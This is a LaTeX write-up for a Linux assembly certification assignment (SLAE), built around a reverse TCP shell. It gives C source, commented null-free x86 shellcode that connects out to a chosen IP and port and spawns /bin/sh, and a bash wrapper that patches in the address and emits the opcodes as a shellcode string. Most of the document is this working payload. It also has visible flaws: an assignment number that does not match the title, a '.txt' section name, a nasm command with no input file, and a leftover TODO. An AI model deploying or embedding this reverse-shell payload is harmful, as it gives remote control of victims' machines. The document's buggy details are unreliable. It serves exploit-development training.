\documentclass{article} 
\title{Reverse TCP shell}
\author{Marco Nappi} 
\usepackage{listings}
\usepackage{geometry}
\geometry{
	a4paper,
	total={170mm,257mm},
	left=20mm,
	top=20mm,
}
\usepackage{hyperref}
\hypersetup{
	colorlinks=true,
	linkcolor=blue,
	filecolor=magenta,
	urlcolor=blue,
}
\begin{document}
\maketitle
\section*{SLAE Assignment 2}
This is the first SLAE Assignment that require to create a Reverse TCP shell shellcode with an wrapper to choose the port and the address to bind.
\section*{The starting point}
To create a REVERSE shell in Asm x86 i started from a simple one written in C:
\begin{lstlisting}[language=C]
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

#define REMOTE_ADDR "XXX.XXX.XXX.XXX"
#define REMOTE_PORT XXX

int main(int argc, char *argv[])
{
struct sockaddr_in sa;
int s;

sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
sa.sin_port = htons(REMOTE_PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect(s, (struct sockaddr *)&sa, sizeof(sa));
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);

execve("/bin/sh", 0, 0);
return 0;
}
\end{lstlisting}

\section*{C code analysis}
From the C code we can individuate the following syscall:\\
$\bullet$ socket \\
$\bullet$ connect \\
$\bullet$ dup2 (that is called 3 times)\\
$\bullet$ execve\\\\		
Using the man command we can find which params each syscall needs from his synopsis:\\
$\bullet$ int socket(int domain, int type, int protocol);\\
$\bullet$ int connect(int sockfd, const struct sockaddr *addr,
socklen\_t addrlen);
\\
$\bullet$ int dup2(int oldfd, int newfd);\\
$\bullet$ int execve(const char *filename, char *const argv[],
char *const envp[]);\\\\
The last question before starting to write the Asm code is :\\
How to call a syscall using Asm in Linux 86 ?\\
To call a syscall we have to work with the register like so:\\\\	
$\bullet$ In EAX we put the number of the syscall\\
$\bullet$ In EBX we put the first argument of the syscall\\
$\bullet$ In ECX we put the second argument of the syscall\\
$\bullet$ In EDX we put the third argument of the syscall\\
$\bullet$ In ESI we put the fourth argument of the syscall\\
$\bullet$ In EDI we put the fifth argument of the syscall\\

\section*{The asm code}
\begin{lstlisting}[language={[x86masm]Assembler}]
global _start
section .txt
_start:
;zeroing
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
;create the socket
mov ax,359 ;setting as syscall the socket one
mov bl,0x02 ; passing 02 as the domain that stands for AF_INET
mov cl,0x01 ; passing 01 as the type that stands for SOCK_STREAM
int 0x80 ; calling the soft interrupt to run the syscall
mov edi,eax ; storing the socket fd into edi (NB:eax stores the output too)
;prepare arguments for connect (to avoid null)
mov ecx,0x1003010B ;passing an IP adrress with alla octets increased by 1 
sub ecx,0x01010101 ;subtracting 1 to all the octets 
push ecx ; pushing on the stack because we need the pointer to the IP not the IP
push word 0xd31e ; pushing the port 
push word 0x02 ; specifying the family : AF_INET
;connect	
mov ax,362 ; setting the syscall connect
mov ebx,edi ; passing as 1st param the socket fd
mov ecx,esp ; passing the pointer to the struct create 
mov dl,16 ; specifying the address lenght
int 0x80 ; calling the soft interrupt to run the syscall
;dup2 times 3
mov cl,0x03 ;setting the counter 
;using cx we define the iterator and all the 3 fd
dup2:
xor eax,eax	;zoring the register to be sure to call the right syscall
mov al,63 ; setting the dup2 syscall
mov ebx,edi ; setting the socket fd 
dec ecx ; decrising the counter
int 0x80 ; calling the soft interrupt to run the syscall
jnz dup2 ; if the zero flag is 0 jumps to the label dup2
;execve /bin//sh
xor eax,eax ; setting to NULL eax
push eax ; using eax as NULL terminator
push 0x68732f2f  
push 0x6e69622f ; setting the comand to run /bin//sh (in reverse)
mov ebx,esp ; setting the pointer to /bin//sh
push eax ; using eax as NULL 
mov edx,esp ; setting the pointer to envp as null
push ebx; using eax as NULL 
mov ecx,esp ; setting the pointer to argv as null
mov eax, 0x0B; setting the execve syscall
int 0x80; soft interrupt to run the syscall
\end{lstlisting}
\section*{The wrapper}
For this assignment a wrapper to choose on which port bind the shell is required.\\The following wrapper is written in bash
\begin{lstlisting}[language=bash]
x=$(printf "%x" $1);
echo $x;
echo ${x:2:4}${x:0:2};
y=$(printf "%x" $2);
echo $y;
echo $((${y:6:8}+1))$((${y:4:6}+1))$((${y:2:4}+1))$((${y:0:2}+1));
cp slae.asm ./slae_.asm;
sed s/0xport/0x$x/g slae_.asm -i;
sed s/0xaddress/0x$y/g slae_.asm -i;
nasm -f elf32 -o slae.o;
ld slae.o -o slae;
objdump -d ./slae|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|
cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|
paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';
\end{lstlisting}
TODO ADD github link.
All the code and the wrapper(s) can be found a this link on gitlab.
\section*{Gitlab Repository}
Here it is the link to my SLAE repository:\\
\url{https://gitlab.com/mrcnpp/SLAE/-/tree/master/SLAE32}
\section*{References}
A good alternative to the man cmd is this site:\\
\url{https://man7.org/linux/man-pages/man2}\\
The C code come from this guy repository:\\
\url{https://gist.github.com/0xabe-io/916cf3af33d1c0592a90}\\
Thanks to all guys of the "Assemblers County" who helped me 
\section*{SLAE Statement}
This blog post has been	created	for	completing the requirements of the	SecurityTube Linux Assembly	Expert certification:\\
\url{http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert}\\
Student ID: SLAE-1545  
\end{document}